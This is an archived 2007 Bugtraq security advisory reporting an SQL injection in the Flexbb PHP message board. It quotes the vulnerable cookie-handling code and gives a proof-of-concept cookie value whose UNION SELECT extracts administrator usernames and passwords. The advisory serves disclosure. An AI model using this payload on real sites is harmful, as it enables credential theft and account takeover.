[<prev] [next>] [day] [month] [year] [list]
Message-ID: <25266.86657.qm@web90408.mail.mud.yahoo.com>
Date: Tue, 27 Mar 2007 01:57:24 -0700 (PDT)
From: alireza hassani <trueend5@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [KAPDA::#64] - Flexbb Sql Injection
KAPDA New advisory
Vendor: http://www.flexbb.net
Vulnerable Version: 1.0.0 10005 Beta Release 1
Bug: SQL Injection
Exploitation: Remote with browser
Description:
--------------------
Flexbb is a freely available PHP-based message board
program that uses a MySQL database.
Vulnerability:
--------------------
Sql Injection:
The software does not properly validate user-supplied
input that may allow a remote user to launch Sql
injection attacks.
There are multiple Input Validation errors, for
example:
// Code Snippet
// Includes/Start.php
// Lines #190-197
if($_COOKIE['flexbb_lang_id'] == "")
{
$lang_id = $config['default_lang_id'];
}
else
{
$lang_id = $_COOKIE['flexbb_lang_id']; //--->Input
Validation Error
}
POC:
--------------------
Condition: Magic quotes GPC = Off
GET: http://example.com/flexbb/index.php?debug=1
Cookie Name = flexbb_lang_id
Cookie Value = none' UNION SELECT 'en',`username`,
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4
original Advisory:
--------------------
http://www.kapda.ir/advisory-481.html
Solution:
--------------------
No response from vendor, there is no solution at the
time of this entry.
Credit :
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]
____________________________________________________________________________________
TV dinner still cooling?
Check out "Tonight's Picks" on Yahoo! TV.
http://tv.yahoo.com/
Powered by blists - more mailing lists